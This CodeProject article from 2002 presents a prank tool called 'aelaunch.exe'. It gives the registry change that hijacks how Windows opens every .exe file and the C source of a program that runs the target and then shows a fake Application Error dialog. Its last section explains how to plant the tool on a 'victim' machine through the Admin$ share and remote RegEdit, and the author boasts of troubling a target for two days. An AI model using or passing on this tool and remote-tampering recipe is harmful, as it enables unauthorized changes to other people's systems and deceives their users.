Click here to Skip to main content
65,938 articles
CodeProject is changing. Read more.
Articles
 
(untagged)

Application Terror

0.00/5 (No votes)
28 May 2002 1  
How to (really) annoy your friends and foes or even your boss.

Sample Image - Application_Terror.jpg

Being Bad

If you ever wanted to annoy someone really, here is a way to do it. Windows stores for .exe files a registry key which specifies what to do with a ".exe" file. It is located at HKEY_CLASSES_ROOT\exefile\shell\open\command and normally contains the value "%1" %* which just means: do what the first parameter specifies and pass the rest of the parameters as new parameters. As you may know, the first parameter is the full name of the .exe file to be executed.

And here we start with our nasty trick. We redirect the command line to our "application". We do this by modifying the registry key:

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"aelaunch.exe\" %1 %*"

You see already that our application is named AELAUNCH.EXE (you can give it any name) and takes some parameters.

The Bad One

Well, from now on, any application seems to generate an application error but still continues to run somehow.

The application is no miracle, it doesn't need nor use MFC. The whole code is just about 50 lines including comments. The main function is:

int APIENTRY _tWinMain(HINSTANCE hInst, 
   HINSTANCE,LPTSTR lpCmdLine, int nCmdShow)
{
    if (lpCmdLine[0] != '\0') // we have a command line?

    {
        LPSTR p = lpCmdLine;
        while(*p)
        {
            if(*p == '\"') // lets get rid of any quotes

                *p = ' ';
            p++;
        }
        // ::MessageBox(NULL, lpCmdLine, "Commandline", MB_OK);

        WinExec(lpCmdLine, nCmdShow);
    }

    DialogBox(hInst, (LPCTSTR)IDD_APPLICATIONTERROR_DIALOG, 
                                   NULL, (DLGPROC)DialogProc);
    
    return 0;
}

It uses the "obsolete" function WinExec() just because it's convenient and works perfectly. Using CreateProcess() or ShellExecute() would cause far too much trouble.

As you see, the application checks for a command line, replaces any existing quote characters with spaces (we really don't need them here anymore) and passes the command line to WinExec.

When WinExec returns (as soon as the starting application calls the first time, GetMessage()), the application shows a dialog which happen to look like the well known Application Error dialog. :-)

Relax and Enjoy

Now you may wonder how this will annoy anyone? Remember a default share called Admin$? And do you remember that RegEdit can connect to other machines? Bingo, just copy the executable to your victim's Admin$\system32 directory, run RegEdit and modify the registry of the victim's machine. Here you go...

Try it and smile, while making a mental list of who will be the next target for aelaunch.exe.

The last one whom I targeted with it suffered 2 days until he found what I did. It was a well done payback.

License

This article has no explicit license attached to it but may contain usage terms in the article text or the download files themselves. If in doubt please contact the author via the discussion board below.

A list of licenses authors might use can be found here



Permalink

Privacy
Cookies
Terms of Use
Layout: fixed | fluid

Article Copyright 2002 by Andreas Saurwein Franci Gonalves
Everything else Copyright © CodeProject, 1999-2024

Web01 2.8:2024-10-20:1